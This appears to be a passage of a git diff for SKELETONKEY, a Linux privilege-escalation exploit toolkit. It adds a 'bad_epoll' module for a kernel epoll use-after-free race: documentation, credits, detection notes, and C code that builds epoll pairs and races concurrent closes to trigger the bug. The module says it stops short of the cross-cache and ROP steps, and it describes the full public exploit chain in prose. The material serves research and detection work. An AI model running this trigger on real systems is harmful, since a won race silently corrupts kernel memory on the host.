trips KASAN) — the shipped auditd/sigma/falco rules key on the
|
||||
post-exploitation euid-0 transition, with no yara; treat this as much as a
|
||||
blue-team "your stack is nearly blind to this" teaching case as an
|
||||
offensive one. Wired: registry, Makefile, safety rank (12), 5 `detect()`
|
||||
test rows (version gating), CVE metadata (CWE-416 / T1068 / not-KEV),
|
||||
README + CVES.md + website counts (44/39), RELEASE_NOTES v0.9.12, and a
|
||||
verify-vm target (sweep pending). Credits Jaeyoung Chung + the upstream
|
||||
fix in `NOTICE.md`. Reconstructed from the public kernelCTF PoC and not
|
||||
VM-verified, so the verified count stays 28 of 39.
|
||||
|
||||
## SKELETONKEY v0.9.11 — new LPE module: nft_catchall (CVE-2026-23111)
|
||||
|
||||
Adds **`nft_catchall` — CVE-2026-23111**, taking the corpus to **43
|
||||
|
||||
+16
-14
@@ -4,16 +4,16 @@
|
||||
<meta charset="UTF-8">
|
||||
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
||||
<title>SKELETONKEY — Linux LPE corpus, VM-verified, SOC-ready detection</title>
|
||||
<meta name="description" content="One binary. 43 Linux privilege-escalation modules from 2016 to 2026. 28 of 38 CVEs empirically verified in real Linux VMs. 13 KEV-listed. 151 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
|
||||
<meta name="description" content="One binary. 45 Linux privilege-escalation modules from 2016 to 2026. 28 of 40 CVEs empirically verified in real Linux VMs. 13 KEV-listed. 151 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
|
||||
<meta property="og:title" content="SKELETONKEY — Linux LPE corpus, VM-verified">
|
||||
<meta property="og:description" content="43 Linux LPE modules; 28 of 38 CVEs empirically verified in real VMs. 151 detection rules. ATT&CK + CWE + KEV annotated.">
|
||||
<meta property="og:description" content="45 Linux LPE modules; 28 of 40 CVEs empirically verified in real VMs. 151 detection rules. ATT&CK + CWE + KEV annotated.">
|
||||
<meta property="og:type" content="website">
|
||||
<meta property="og:url" content="https://karazajac.github.io/SKELETONKEY/">
|
||||
<meta property="og:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
|
||||
<meta property="og:url" content="https://skeletonkey.netslum.io/">
|
||||
<meta property="og:image" content="https://skeletonkey.netslum.io/og.png?v=2">
|
||||
<meta property="og:image:width" content="1200">
|
||||
<meta property="og:image:height" content="630">
|
||||
<meta name="twitter:card" content="summary_large_image">
|
||||
<meta name="twitter:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
|
||||
<meta name="twitter:image" content="https://skeletonkey.netslum.io/og.png?v=2">
|
||||
<meta name="theme-color" content="#0a0a14">
|
||||
|
||||
<link rel="preconnect" href="https://fonts.googleapis.com">
|
||||
@@ -62,8 +62,8 @@
|
||||
<span class="display-wordmark">SKELETONKEY</span>
|
||||
</h1>
|
||||
<p class="hero-tag">
|
||||
One binary. <strong>43 Linux LPE modules</strong> covering 38 CVEs —
|
||||
<strong>every year 2016 → 2026</strong>. 28 of 38 confirmed against
|
||||
One binary. <strong>45 Linux LPE modules</strong> covering 40 CVEs —
|
||||
<strong>every year 2016 → 2026</strong>. 28 of 40 confirmed against
|
||||
real Linux kernels in VMs. SOC-ready detection rules in four SIEM
|
||||
formats. MITRE ATT&CK + CWE + CISA KEV annotated.
|
||||
<span class="hero-tag-pop">--explain gives a one-page operator briefing per CVE.</span>
|
||||
@@ -81,7 +81,7 @@
|
||||
</div>
|
||||
|
||||
<div class="stats-row" id="stats-row">
|
||||
<div class="stat-chip"><span class="num" data-target="43">0</span><span>modules</span></div>
|
||||
<div class="stat-chip"><span class="num" data-target="45">0</span><span>modules</span></div>
|
||||
<div class="stat-chip stat-vfy"><span class="num" data-target="28">0</span><span>✓ VM-verified</span></div>
|
||||
<div class="stat-chip stat-kev"><span class="num" data-target="13">0</span><span>★ in CISA KEV</span></div>
|
||||
<div class="stat-chip"><span class="num" data-target="151">0</span><span>detection rules</span></div>
|
||||
@@ -227,7 +227,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="bento-icon">★</div>
|
||||
<h3>CISA KEV prioritized</h3>
|
||||
<p>
|
||||
13 of 38 CVEs in the corpus are in CISA's Known Exploited
|
||||
13 of 40 CVEs in the corpus are in CISA's Known Exploited
|
||||
Vulnerabilities catalog — actively exploited in the wild.
|
||||
Refreshed on demand via <code>tools/refresh-cve-metadata.py</code>.
|
||||
</p>
|
||||
@@ -289,12 +289,12 @@ uid=0(root) gid=0(root)</pre>
|
||||
|
||||
<article class="bento-card bento-vfy">
|
||||
<div class="bento-icon">✓</div>
|
||||
<h3>22 modules empirically verified</h3>
|
||||
<h3>28 modules empirically verified</h3>
|
||||
<p>
|
||||
<code>tools/verify-vm/</code> spins up known-vulnerable
|
||||
kernels (stock distro + mainline from kernel.ubuntu.com), runs
|
||||
<code>--explain --active</code> per module, and records the
|
||||
verdict. <strong>28 of 38 CVEs</strong> confirmed against
|
||||
verdict. <strong>28 of 40 CVEs</strong> confirmed against
|
||||
real Linux across Ubuntu 18.04 / 20.04 / 22.04 + Debian 11 / 12
|
||||
+ mainline 5.4.0-26 / 5.15.5 / 6.1.10 / 6.19.7. Records baked into the binary;
|
||||
<code>--list</code> shows ✓ per module.
|
||||
@@ -309,7 +309,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="container">
|
||||
<div class="section-head">
|
||||
<span class="section-tag">corpus</span>
|
||||
<h2>38 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
|
||||
<h2>40 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
|
||||
</div>
|
||||
|
||||
<h3 class="corpus-h" data-color="green">
|
||||
@@ -358,6 +358,8 @@ uid=0(root) gid=0(root)</pre>
|
||||
<span class="pill yellow">ptrace_pidfd</span>
|
||||
<span class="pill yellow">cifswitch</span>
|
||||
<span class="pill yellow">nft_catchall</span>
|
||||
<span class="pill yellow">bad_epoll</span>
|
||||
<span class="pill yellow">ghostlock</span>
|
||||
</div>
|
||||
|
||||
<p class="corpus-foot">
|
||||
@@ -418,7 +420,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="audience-icon">🎓</div>
|
||||
<h3>Researchers / CTF</h3>
|
||||
<p>
|
||||
38 CVEs, 10-year span, each with the original PoC author
|
||||
40 CVEs, 10-year span, each with the original PoC author
|
||||
credited and the kernel-range citation auditable.
|
||||
<code>--explain</code> shows the reasoning chain; detection
|
||||
rules let you practice both sides. Source is the documentation.
|
||||
@@ -515,7 +517,7 @@ uid=0(root) gid=0(root)</pre>
|
||||
<div class="tl-col tl-shipped">
|
||||
<div class="tl-tag">shipped</div>
|
||||
<ul>
|
||||
<li><strong>28 of 38 CVEs empirically verified</strong> in real Linux VMs</li>
|
||||
<li><strong>28 of 40 CVEs empirically verified</strong> in real Linux VMs</li>
|
||||
<li><strong>kernel.ubuntu.com/mainline/</strong> kernel fetch path — unblocks pin-not-in-apt targets</li>
|
||||
<li>Per-module <code>verified_on[]</code> table baked into the binary</li>
|
||||
<li><strong>--explain mode</strong> — one-page operator briefing per CVE</li>
|
||||
|
||||
BIN
Binary file not shown.
|
Before Width: | Height: | Size: 123 KiB After Width: | Height: | Size: 73 KiB |
+1
-1
@@ -80,6 +80,6 @@
|
||||
|
||||
<!-- subtle url at very bottom -->
|
||||
<text x="1120" y="610" font-family="'JetBrains Mono',monospace" font-size="14" fill="#5b5b75" text-anchor="end">
|
||||
karazajac.github.io/SKELETONKEY
|
||||
skeletonkey.netslum.io
|
||||
</text>
|
||||
</svg>
|
||||
|
||||
|
Before Width: | Height: | Size: 4.0 KiB After Width: | Height: | Size: 4.0 KiB |
@@ -0,0 +1,106 @@
|
||||
# bad_epoll — CVE-2026-46242
|
||||
|
||||
"Bad Epoll" — a race-condition use-after-free in the Linux kernel epoll
|
||||
subsystem (`fs/eventpoll.c`) reachable by **any unprivileged local user**.
|
||||
No user namespace, no capability, no special `CONFIG` — `epoll_create1(2)`,
|
||||
`epoll_ctl(2)`, and `close(2)` are available to everyone, which is what
|
||||
makes this bug unusually dangerous.
|
||||
|
||||
## The bug
|
||||
|
||||
On the file-teardown path, `ep_remove()` clears `file->f_ep` under
|
||||
`file->f_lock` but keeps **using** the file inside the same critical
|
||||
section — the `hlist_del_rcu()` walk over the eventpoll's `refs` list and
|
||||
the trailing `spin_unlock()`. A concurrent `__fput()` of a linked epoll
|
||||
file can observe the transient `NULL` `f_ep`, skip
|
||||
`eventpoll_release_file()`, and jump straight to `f_op->release`, freeing
|
||||
a `struct eventpoll` that the first path is still walking →
|
||||
**use-after-free** on a live kernel object.
|
||||
|
||||
The public exploit (Jaeyoung Chung, submitted to Google's kernelCTF)
|
||||
arranges four epoll objects in two pairs — one pair drives the race, the
|
||||
other is the victim — and converts the 8-byte UAF write into control of a
|
||||
`struct file` via a **cross-cache** attack (the freed `eventpoll` slab
|
||||
page is drained to the buddy allocator and reclaimed as pipe backing
|
||||
buffers). From there it reads arbitrary kernel memory through
|
||||
`/proc/self/fdinfo` and ROPs to a root shell. Roughly **99% reliable**
|
||||
despite a race window only ~6 instructions wide; the racer widens it with
|
||||
`close(dup())` storms that induce false-sharing on the file's `f_count`
|
||||
cache line. It **rarely trips KASAN**, which is why the bug survived three
|
||||
years and why it is hard to detect at runtime.
|
||||
|
||||
## Affected range
|
||||
|
||||
| | |
|
||||
|---|---|
|
||||
| Vulnerable path introduced | commit `58c9b016e128` — Linux **6.4** (2023-04-08) |
|
||||
| Fixed upstream | commit `a6dc643c69311677c574a0f17a3f4d66a5f3744b` — merged for **7.1-rc1** (2026-04-24) |
|
||||
| Stable backport | **7.0.13** (Debian forky `7.0.13-1` / sid `7.0.14-1`) |
|
||||
| Still vulnerable at time of writing | trixie **6.12.x** (no backport yet); 6.6 LTS pending |
|
||||
| Not affected | 6.1 and older (predate the bug — Debian: "vulnerable code not present") |
|
||||
| NVD class | CWE-416 (Use After Free) via CWE-362 (race) |
|
||||
| CISA KEV | no (brand new) |
|
||||
|
||||
Table threshold is a single `{7,0,13}` entry — `kernel_range_is_patched()`
|
||||
treats 7.1+ as patched-via-mainline and everything in `[6.4, 7.0.13)` as
|
||||
vulnerable, matching the Debian tracker. Add 6.6.x / 6.12.x rows when
|
||||
those LTS backports land (`tools/refresh-kernel-ranges.py` flags them).
|
||||
|
||||
## Trigger / detection
|
||||
|
||||
`detect()` is a **pure version gate** — no active probe, because there is
|
||||
no cheap, safe way to distinguish a vulnerable kernel from a patched one
|
||||
without actually winning the race (the dangerous part). It returns `OK`
|
||||
below 6.4 or on a patched kernel, and `VULNERABLE` in range. There is **no
|
||||
`PRECOND_FAIL` userns path** the way `nft_catchall` has — epoll needs no
|
||||
namespace, so there is no unprivileged-userns stopgap to report or to
|
||||
harden with.
|
||||
|
||||
`exploit()` forks a CPU-pinned child that builds the epoll race pair (a
|
||||
waiter eventpoll watching a target eventpoll) and exercises the
|
||||
`ep_remove`-vs-`__fput` concurrent-close window a **hard-bounded** number
|
||||
of times (48 attempts / 2 s), widening it with `close(dup())`
|
||||
false-sharing storms, snapshots the `eventpoll`/`kmalloc-192` slab, and
|
||||
returns `EXPLOIT_FAIL`.
|
||||
|
||||
It is **deliberately under-driven**. A *won* race frees a live
|
||||
`struct eventpoll` — genuine kernel memory corruption that rarely trips
|
||||
KASAN, so on a vulnerable production host a completed race can silently
|
||||
destabilise the box rather than cleanly oops. This module therefore does
|
||||
**not** grind the race to a win, does **not** perform the cross-cache
|
||||
reclaim, and does **not** bundle the per-kernel `fdinfo` arbitrary-read +
|
||||
ROP that lands root (per-build offsets refused). The trigger is
|
||||
**reconstructed from the public kernelCTF PoC and is not VM-verified**. It
|
||||
never claims root it did not get.
|
||||
|
||||
Because a kernel race is the least predictable class in the corpus — and
|
||||
this one can corrupt memory invisibly — `bad_epoll` carries the **lowest
|
||||
`--auto` safety rank** (see `module_safety_rank()` in `skeletonkey.c`), so
|
||||
`--auto` only ever reaches for it after every safer vulnerable module.
|
||||
|
||||
## Detection is hard — read this before shipping the rules
|
||||
|
||||
Unlike most modules, `bad_epoll` has **no high-fidelity signature**.
|
||||
`epoll_create1` / `epoll_ctl` / `close` is the steady-state behaviour of
|
||||
nginx, systemd, and every language runtime's event loop; the exploit
|
||||
looks identical and rarely trips KASAN. The shipped auditd/sigma/falco
|
||||
rules therefore key on the **post-exploitation** tell — an unprivileged
|
||||
process transitioning to euid 0 without a setuid `execve` — plus a
|
||||
recommendation to monitor kernel logs for oops/BUG lines. Expect false
|
||||
positives from legitimate privilege-management daemons and tune per
|
||||
environment. There is no yara rule (no file artifact). Treat this module
|
||||
as much as a *blue-team teaching case* — "here is a root LPE your existing
|
||||
stack is nearly blind to" — as an offensive one.
|
||||
|
||||
## Fix / mitigation
|
||||
|
||||
Upgrade the kernel (>= 7.0.13, or 7.1+). There is **no partial
|
||||
mitigation**: epoll cannot be disabled in practice, and no
|
||||
`unprivileged_userns_clone` / sysctl toggle closes this path the way it
|
||||
does for the netfilter bugs. `mitigate()` is `NULL` for that reason.
|
||||
|
||||
## Credit
|
||||
|
||||
Discovery, exploitation, and the public kernelCTF PoC:
|
||||
**Jaeyoung Chung** (`J-jaeyoung`). Upstream fix `a6dc643c6931`. See
|
||||
`NOTICE.md`.
|
||||
@@ -0,0 +1,70 @@
|
||||
# NOTICE — bad_epoll (CVE-2026-46242)
|
||||
|
||||
## Vulnerability
|
||||
|
||||
**CVE-2026-46242** — "Bad Epoll", a **race-condition use-after-free** in
|
||||
the Linux kernel epoll subsystem (`fs/eventpoll.c`). On the file-teardown
|
||||
path, `ep_remove()` clears `file->f_ep` under `file->f_lock` but continues
|
||||
to use the file inside the critical section (`hlist_del_rcu()` over the
|
||||
eventpoll `refs` list + `spin_unlock()`). A concurrent `__fput()` of a
|
||||
linked epoll file observes the transient `NULL` `f_ep`, skips
|
||||
`eventpoll_release_file()`, and proceeds to `f_op->release`, freeing a
|
||||
`struct eventpoll` still in use → UAF.
|
||||
|
||||
The bug is reachable by **any unprivileged local user** — `epoll_create1`,
|
||||
`epoll_ctl`, and `close` require no capability, no user namespace, and no
|
||||
special kernel config. Exploitation converts the 8-byte UAF write into
|
||||
control of a `struct file` via a cross-cache attack, gains arbitrary
|
||||
kernel read through `/proc/self/fdinfo`, and ROPs to a root shell —
|
||||
roughly 99% reliable despite a ~6-instruction race window. It also affects
|
||||
Android. NVD class: **CWE-416** (Use After Free), with a **CWE-362** race
|
||||
root cause. **Not** in CISA KEV (brand new).
|
||||
|
||||
## Research credit
|
||||
|
||||
- **Discovery, exploitation, and public PoC** by **Jaeyoung Chung**
|
||||
(GitHub `J-jaeyoung`), submitted as a zero-day to **Google's kernelCTF**
|
||||
program. Repository: <https://github.com/J-jaeyoung/bad-epoll> and the
|
||||
kernelCTF submission under
|
||||
`J-jaeyoung/security-research` (`CVE-2026-46242_lts_cos`, target
|
||||
`lts-6.12.67`). SKELETONKEY's trigger reconstruction is informed by that
|
||||
public PoC (the epoll object graph and the `ep_remove`-vs-`__fput`
|
||||
close-race shape only — no offsets or ROP are reused).
|
||||
- **Introduced** by commit `58c9b016e128` (Linux 6.4, 2023-04-08).
|
||||
- **Fixed upstream** by commit
|
||||
`a6dc643c69311677c574a0f17a3f4d66a5f3744b`, merged for **7.1-rc1**
|
||||
(2026-04-24); stable backport **7.0.13**.
|
||||
- Debian security tracker (authoritative backport versions):
|
||||
<https://security-tracker.debian.org/tracker/CVE-2026-46242> — forky
|
||||
`7.0.13-1` / sid `7.0.14-1` fixed; trixie 6.12.x still vulnerable at time
|
||||
of writing; bookworm 6.1 and bullseye 5.10 "not affected — vulnerable
|
||||
code not present".
|
||||
|
||||
All credit for finding, analysing, and exploiting this bug belongs to
|
||||
Jaeyoung Chung and to the upstream maintainers who fixed it. SKELETONKEY
|
||||
is the bundling and bookkeeping layer only.
|
||||
|
||||
## SKELETONKEY role
|
||||
|
||||
🟡 **Trigger (reconstructed) — primitive-only, not VM-verified.** This is
|
||||
the corpus's first epoll / VFS-file-teardown module and its cleanest
|
||||
example of an SMP kernel race, shipped on the same "fire the bug class and
|
||||
stop" contract as `stackrot` (CVE-2023-3269) and `nft_catchall`
|
||||
(CVE-2026-23111).
|
||||
|
||||
`detect()` is a pure kernel-version gate (vulnerable iff `>= 6.4` and below
|
||||
the fix on-branch; stable backport 7.0.13, 7.1+ inherits; 6.1/5.10 not
|
||||
affected) — no userns or CONFIG precondition, because none is required.
|
||||
`exploit()` forks a CPU-pinned child that builds the epoll race pair and
|
||||
exercises the `ep_remove`-vs-`__fput` concurrent-close window a
|
||||
hard-bounded number of times (48 attempts / 2 s), widening it with
|
||||
`close(dup())` false-sharing storms, snapshots the eventpoll slab, and
|
||||
returns `EXPLOIT_FAIL`.
|
||||
|
||||
It is **deliberately under-driven**: a won race frees a live
|
||||
`struct eventpoll` (real corruption that rarely trips KASAN), so the module
|
||||
does not grind the race to a win, does not perform the cross-cache reclaim,
|
||||
and does not bundle the `/proc/self/fdinfo` arbitrary-read + ROP root-pop
|
||||
(per-build offsets refused). The trigger is reconstructed from the public
|
||||
kernelCTF PoC, not VM-verified — it never claims root it did not get. It
|
||||
carries the lowest `--auto` safety rank in the corpus.
|
||||
@@ -0,0 +1,434 @@
|
||||
/*
|
||||
* bad_epoll_cve_2026_46242 — SKELETONKEY module
|
||||
*
|
||||
* CVE-2026-46242 — "Bad Epoll", a race-condition use-after-free in the
|
||||
* Linux kernel epoll subsystem (fs/eventpoll.c). On the file-teardown
|
||||
* path, ep_remove() clears file->f_ep under file->f_lock but keeps
|
||||
* *using* the file inside the critical section (the hlist_del_rcu() over
|
||||
* the eventpoll's refs list + spin_unlock). A concurrent __fput() of a
|
||||
* linked epoll file can observe the transient NULL f_ep, skip
|
||||
* eventpoll_release_file(), and go straight to f_op->release — freeing a
|
||||
* struct eventpoll that the first path is still walking. The result is a
|
||||
* UAF on a live kernel object reachable by ANY unprivileged local user:
|
||||
* epoll_create1(2) / epoll_ctl(2) / close(2) need no capability, no user
|
||||
* namespace, and no special CONFIG (epoll is always built in). That is
|
||||
* what makes it nasty — there is no unprivileged-userns stopgap to close
|
||||
* the way there is for the netfilter bugs; the only fix is to patch.
|
||||
*
|
||||
* Public exploit (Jaeyoung Chung / J-jaeyoung, "bad-epoll"), submitted
|
||||
* to Google's kernelCTF: four epoll objects in two pairs — one pair
|
||||
* drives the race, the other is the victim — turn the 8-byte UAF write
|
||||
* into control of a struct file via a cross-cache attack, then arbitrary
|
||||
* kernel read via /proc/self/fdinfo and a ROP chain to a root shell.
|
||||
* ~99% reliable despite a race window only ~6 instructions wide; it
|
||||
* rarely trips KASAN, which is precisely why the bug hid for three
|
||||
* years.
|
||||
*
|
||||
* CWE-416 (Use After Free) via CWE-362 (race). Introduced by commit
|
||||
* 58c9b016e128 (Linux 6.4, 2023-04-08); fixed by commit
|
||||
* a6dc643c69311677c574a0f17a3f4d66a5f3744b (merged for 7.1-rc1,
|
||||
* 2026-04-24), stable backport 7.0.13. NOT in CISA KEV (brand new).
|
||||
*
|
||||
* STATUS: 🟡 TRIGGER (reconstructed) — primitive-only, NOT VM-verified.
|
||||
* This is a genuine SMP kernel race that, if *won*, frees a live
|
||||
* struct eventpoll — real memory corruption that (per the public
|
||||
* analysis) rarely trips KASAN, so a won-but-not-completed race can
|
||||
* silently destabilise a vulnerable host rather than cleanly oops.
|
||||
* For that reason this module is deliberately UNDER-DRIVEN: exploit()
|
||||
* builds the epoll object graph and exercises the concurrent-close
|
||||
* window (ep_remove vs __fput) a small, bounded number of times inside
|
||||
* a fork-isolated child, snapshots the eventpoll slab, and STOPS. It
|
||||
* does NOT grind the race to a win, does NOT perform the cross-cache
|
||||
* reclaim, and does NOT bundle the per-kernel fdinfo arbitrary-read +
|
||||
* ROP that lands root (per-build offsets refused). It returns
|
||||
* EXPLOIT_FAIL and never claims root it did not get. The trigger is
|
||||
* reconstructed from the public kernelCTF PoC, not VM-verified. This
|
||||
* is why it carries the lowest safety rank in --auto (a kernel race is
|
||||
* the least predictable class; see skeletonkey.c module_safety_rank).
|
||||
*
|
||||
* detect() is a pure version gate: vulnerable iff the running kernel is
|
||||
* >= 6.4 (the commit that introduced the bug) AND below the fix on its
|
||||
* branch (Debian: bookworm/6.1 and bullseye/5.10 are "not affected —
|
||||
* vulnerable code not present"; trixie/6.12 still vulnerable at time of
|
||||
* writing; forky/sid fixed at 7.0.13/7.0.14). No userns / CONFIG
|
||||
* precondition — any unprivileged user can reach it.
|
||||
*
|
||||
* Affected range (Debian security tracker, source of record):
|
||||
* introduced 6.4 (58c9b016e128); mainline fix in 7.1-rc1
|
||||
* (a6dc643c6931); stable backport 7.0.13. 6.6/6.12 LTS backports had
|
||||
* not landed at time of writing → version-only VULNERABLE there
|
||||
* (tools/refresh-kernel-ranges.py will extend the table as distros
|
||||
* publish). 6.1 and older predate the bug.
|
||||
*
|
||||
* arch_support: x86_64 (the cross-cache groom + any future finisher are
|
||||
* x86_64-tuned; detect() and the reachability trigger are arch-neutral
|
||||
* but we only claim x86_64 for exploit()).
|
||||
*/
|
||||
|
||||
#include "skeletonkey_modules.h"
|
||||
#include "../../core/registry.h"
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <string.h>
|
||||
#include <stdbool.h>
|
||||
#include <unistd.h>
|
||||
|
||||
#ifdef __linux__
|
||||
|
||||
#include "../../core/kernel_range.h"
|
||||
#include "../../core/host.h"
|
||||
|
||||
#include <stdint.h>
|
||||
#include <stdatomic.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <time.h>
|
||||
#include <sched.h>
|
||||
#include <pthread.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/epoll.h>
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Kernel-range table. The fix landed mainline in 7.1-rc1
|
||||
* (a6dc643c6931); the only stable backport that had shipped at time of
|
||||
* writing is 7.0.13 (Debian forky 7.0.13-1 / sid 7.0.14-1). A single
|
||||
* {7,0,13} entry plus the ">= 6.4 introduced" gate below is sufficient:
|
||||
* kernel_range_is_patched() treats any branch strictly newer than every
|
||||
* entry (i.e. 7.1+) as patched-via-mainline, and every branch at or
|
||||
* below 7.0 with no exact entry (6.4..6.12, 7.0.<13) as still
|
||||
* vulnerable — which is exactly the Debian tracker's verdict. Add
|
||||
* 6.6.x / 6.12.x entries here when those LTS backports land (the drift
|
||||
* checker flags them). security-tracker.debian.org is the source.
|
||||
* ------------------------------------------------------------------ */
|
||||
static const struct kernel_patched_from bad_epoll_patched_branches[] = {
|
||||
{7, 0, 13}, /* 7.0.x (Debian forky 7.0.13-1 / sid 7.0.14-1); 7.1+ inherits */
|
||||
};
|
||||
|
||||
static const struct kernel_range bad_epoll_range = {
|
||||
.patched_from = bad_epoll_patched_branches,
|
||||
.n_patched_from = sizeof(bad_epoll_patched_branches) /
|
||||
sizeof(bad_epoll_patched_branches[0]),
|
||||
};
|
||||
|
||||
static skeletonkey_result_t bad_epoll_detect(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
const struct kernel_version *v = ctx->host ? &ctx->host->kernel : NULL;
|
||||
if (!v || v->major == 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[!] bad_epoll: host fingerprint missing kernel "
|
||||
"version — bailing\n");
|
||||
return SKELETONKEY_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* The vulnerable ep_remove()/__fput() interleaving was introduced by
|
||||
* commit 58c9b016e128 in 6.4. Below that the code pattern is absent
|
||||
* (Debian marks bookworm/6.1 and bullseye/5.10 "not affected —
|
||||
* vulnerable code not present"). */
|
||||
if (!skeletonkey_host_kernel_at_least(ctx->host, 6, 4, 0)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[i] bad_epoll: kernel %s predates the vulnerable "
|
||||
"epoll teardown path (introduced 6.4) — not affected\n",
|
||||
v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (kernel_range_is_patched(&bad_epoll_range, v)) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] bad_epoll: kernel %s is patched (>= 7.0.13 / "
|
||||
"7.1+ inherits the mainline fix)\n", v->release);
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] bad_epoll: VULNERABLE — kernel %s in range "
|
||||
"[6.4, fix); epoll teardown race reachable by any "
|
||||
"unprivileged user (no userns / CONFIG gate)\n",
|
||||
v->release);
|
||||
fprintf(stderr, "[i] bad_epoll: no unprivileged-userns stopgap applies "
|
||||
"here — the only fix is to patch the kernel\n");
|
||||
}
|
||||
return SKELETONKEY_VULNERABLE;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* Reconstructed reachability trigger (deliberately under-driven).
|
||||
*
|
||||
* Faithful minimal shape of the public PoC's race pair: a "waiter"
|
||||
* epoll watches a "target" epoll; the two are then closed concurrently
|
||||
* from CPU-pinned contexts so ep_remove() (driven by fput of the
|
||||
* watched target) races __fput() of the waiter eventpoll. The PoC
|
||||
* widens the ~6-instruction window with close(dup(target)) storms that
|
||||
* induce false-sharing on the file's f_count cache line and stall the
|
||||
* racer's read of f_op.
|
||||
*
|
||||
* We reproduce the OBJECT GRAPH and the CONCURRENT-CLOSE WINDOW with a
|
||||
* small iteration + wall-clock budget, then stop. We do NOT reclaim the
|
||||
* freed slab, do NOT run the depth-3 nesting oracle that only fires
|
||||
* after a real UAF write, and do NOT weaponise. The honest witness is
|
||||
* therefore coarse: a signal in the isolated child (a KASAN oops or
|
||||
* corruption fault, if the race happened to fire) and an eventpoll-slab
|
||||
* delta. Absence of a witness does NOT prove the host is safe.
|
||||
* ------------------------------------------------------------------ */
|
||||
#define BEP_RACE_ITERS 48 /* bounded — reachability probe, not a winner */
|
||||
#define BEP_DUP_CLOSE_ITERS 32 /* window-widening false-sharing storm */
|
||||
#define BEP_RACE_BUDGET_SECS 2 /* honest short cap (public PoC uses 5 min) */
|
||||
|
||||
static void bep_pin_cpu(int cpu)
|
||||
{
|
||||
cpu_set_t set;
|
||||
CPU_ZERO(&set);
|
||||
CPU_SET(cpu, &set);
|
||||
(void)sched_setaffinity(0, sizeof set, &set); /* best-effort */
|
||||
}
|
||||
|
||||
struct bep_racer {
|
||||
int waiter_fd; /* fd the racer closes */
|
||||
atomic_int *go; /* fire signal from main */
|
||||
atomic_int *closed; /* set once the racer has closed */
|
||||
};
|
||||
|
||||
static void *bep_racer_fn(void *arg)
|
||||
{
|
||||
struct bep_racer *r = (struct bep_racer *)arg;
|
||||
bep_pin_cpu(0);
|
||||
/* Spin until main is at the close point, then race. */
|
||||
while (atomic_load_explicit(r->go, memory_order_acquire) == 0)
|
||||
;
|
||||
close(r->waiter_fd);
|
||||
atomic_store_explicit(r->closed, 1, memory_order_release);
|
||||
return NULL;
|
||||
}
|
||||
|
||||
static long bep_slabinfo_active(const char *slab)
|
||||
{
|
||||
FILE *f = fopen("/proc/slabinfo", "r");
|
||||
if (!f) return -1;
|
||||
char line[512];
|
||||
long active = -1;
|
||||
size_t n = strlen(slab);
|
||||
while (fgets(line, sizeof line, f)) {
|
||||
if (strncmp(line, slab, n) == 0 && line[n] == ' ') {
|
||||
long a;
|
||||
if (sscanf(line + n, " %ld", &a) == 1) active = a;
|
||||
break;
|
||||
}
|
||||
}
|
||||
fclose(f);
|
||||
return active;
|
||||
}
|
||||
|
||||
/* One race attempt: build (target, waiter) with waiter watching target,
|
||||
* then close both concurrently. Returns 0 normally; the interesting
|
||||
* outcome (a won race) manifests as a signal that the parent observes,
|
||||
* not a return value. */
|
||||
static void bep_one_attempt(void)
|
||||
{
|
||||
int target = epoll_create1(EPOLL_CLOEXEC);
|
||||
if (target < 0) return;
|
||||
int waiter = epoll_create1(EPOLL_CLOEXEC);
|
||||
if (waiter < 0) { close(target); return; }
|
||||
|
||||
/* waiter watches target — this is the link that makes closing target
|
||||
* drive eventpoll_release_file()/ep_remove() over waiter's eventpoll. */
|
||||
struct epoll_event ev = { .events = EPOLLIN };
|
||||
ev.data.fd = target;
|
||||
if (epoll_ctl(waiter, EPOLL_CTL_ADD, target, &ev) < 0) {
|
||||
close(waiter); close(target); return;
|
||||
}
|
||||
|
||||
atomic_int go = 0, closed = 0;
|
||||
struct bep_racer ra = { .waiter_fd = waiter, .go = &go, .closed = &closed };
|
||||
pthread_t th;
|
||||
if (pthread_create(&th, NULL, bep_racer_fn, &ra) != 0) {
|
||||
close(waiter); close(target); return;
|
||||
}
|
||||
|
||||
/* Widen the window: false-sharing storm on target's f_count line,
|
||||
* then release the racer and close target ourselves so ep_remove
|
||||
* (our fput of the watched file) overlaps __fput of the waiter. */
|
||||
for (int i = 0; i < BEP_DUP_CLOSE_ITERS; i++) {
|
||||
int d = dup(target);
|
||||
if (d >= 0) close(d);
|
||||
}
|
||||
atomic_store_explicit(&go, 1, memory_order_release);
|
||||
close(target);
|
||||
|
||||
pthread_join(th, NULL);
|
||||
}
|
||||
|
||||
static skeletonkey_result_t bad_epoll_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = bad_epoll_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE) {
|
||||
fprintf(stderr, "[-] bad_epoll: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] bad_epoll: already running as root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json)
|
||||
